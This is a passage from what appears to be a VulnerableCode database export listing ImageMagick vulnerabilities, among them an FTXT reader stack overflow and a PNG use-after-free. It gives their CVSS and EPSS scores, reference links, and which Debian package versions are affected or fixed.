https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13303.json

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13303.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-13303

reference_id

reference_type

scores

value	0.0048
scoring_system	epss
scoring_elements	0.65148
published_at	2026-04-26T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65118
published_at	2026-04-21T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65134
published_at	2026-04-24T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65523
published_at	2026-04-02T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65517
published_at	2026-04-07T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.6557
published_at	2026-04-08T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65581
published_at	2026-04-09T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.656
published_at	2026-04-11T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65587
published_at	2026-04-12T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65559
published_at	2026-04-13T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65595
published_at	2026-04-16T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65608
published_at	2026-04-18T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65475
published_at	2026-04-01T12:55:00Z

value	0.0049
scoring_system	epss
scoring_elements	0.65551
published_at	2026-04-04T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-13303

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7.8
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1730368
reference_id	1730368
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1730368

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-13303

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-b7u1-bftt-5kck

url VCID-bd1g-sfsp-37h7

vulnerability_id VCID-bd1g-sfsp-37h7

summary

ImageMagick: Stack buffer overflow in FTXT reader via oversized integer field
### Summary
A stack-based buffer overflow exists in the ImageMagick FTXT image reader. A crafted FTXT file can cause out-of-bounds writes on the stack, leading to a crash.

```
=================================================================
==3537074==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffee4850ef0 at pc 0x5607c408fb33 bp 0x7ffee484fe50 sp 0x7ffee484fe40
WRITE of size 1 at 0x7ffee4850ef0 thread T0
```

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25967.json

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25967.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-25967

reference_id

reference_type

scores

value	0.00018
scoring_system	epss
scoring_elements	0.04955
published_at	2026-04-26T12:55:00Z

value	0.00018
scoring_system	epss
scoring_elements	0.04916
published_at	2026-04-24T12:55:00Z

value	0.00018
scoring_system	epss
scoring_elements	0.04879
published_at	2026-04-21T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17931
published_at	2026-04-12T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17976
published_at	2026-04-11T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.1796
published_at	2026-04-09T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17899
published_at	2026-04-08T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17811
published_at	2026-04-07T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.18055
published_at	2026-04-02T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.1811
published_at	2026-04-04T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17835
published_at	2026-04-18T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17825
published_at	2026-04-16T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17882
published_at	2026-04-13T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-25967

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/9afe96cc325da1e4349fbd7418675af2f8708c10

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/commit/9afe96cc325da1e4349fbd7418675af2f8708c10

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-72hf-fj62-w6j4

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-72hf-fj62-w6j4

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-25967

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-25967

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2442126
reference_id	2442126
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2442126

reference_url

https://github.com/advisories/GHSA-72hf-fj62-w6j4

reference_id

GHSA-72hf-fj62-w6j4

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-72hf-fj62-w6j4

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u6?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u6?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u6%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.15%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.15%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.15%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-25967, GHSA-72hf-fj62-w6j4

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bd1g-sfsp-37h7

url VCID-bum5-f5xb-akeg

vulnerability_id VCID-bum5-f5xb-akeg

summary ImageMagick: use-after-free in MngInfoDiscardObject in coders/png.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-19952.json

reference_id

reference_type

scores

value	7.0
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-19952.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-19952

reference_id

reference_type

scores

value	0.00457
scoring_system	epss
scoring_elements	0.63851
published_at	2026-04-01T12:55:00Z

value	0.00457
scoring_system	epss
scoring_elements	0.63911
published_at	2026-04-02T12:55:00Z

value	0.00457
scoring_system	epss
scoring_elements	0.63937
published_at	2026-04-04T12:55:00Z

value	0.00457
scoring_system	epss
scoring_elements	0.63895
published_at	2026-04-07T12:55:00Z

value	0.00457
scoring_system	epss
scoring_elements	0.63946
published_at	2026-04-08T12:55:00Z

value	0.00457
scoring_system	epss
scoring_elements	0.63964
published_at	2026-04-21T12:55:00Z

value	0.00457
scoring_system	epss
scoring_elements	0.63976
published_at	2026-04-11T12:55:00Z

value	0.00457
scoring_system	epss
scoring_elements	0.63962
published_at	2026-04-12T12:55:00Z

value	0.00457
scoring_system	epss
scoring_elements	0.63929
published_at	2026-04-13T12:55:00Z

value	0.00457
scoring_system	epss
scoring_elements	0.63974
published_at	2026-04-18T12:55:00Z

value	0.00457
scoring_system	epss
scoring_elements	0.63982
published_at	2026-04-24T12:55:00Z

value	0.00457
scoring_system	epss
scoring_elements	0.63994
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-19952

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1792465
reference_id	1792465
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1792465

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

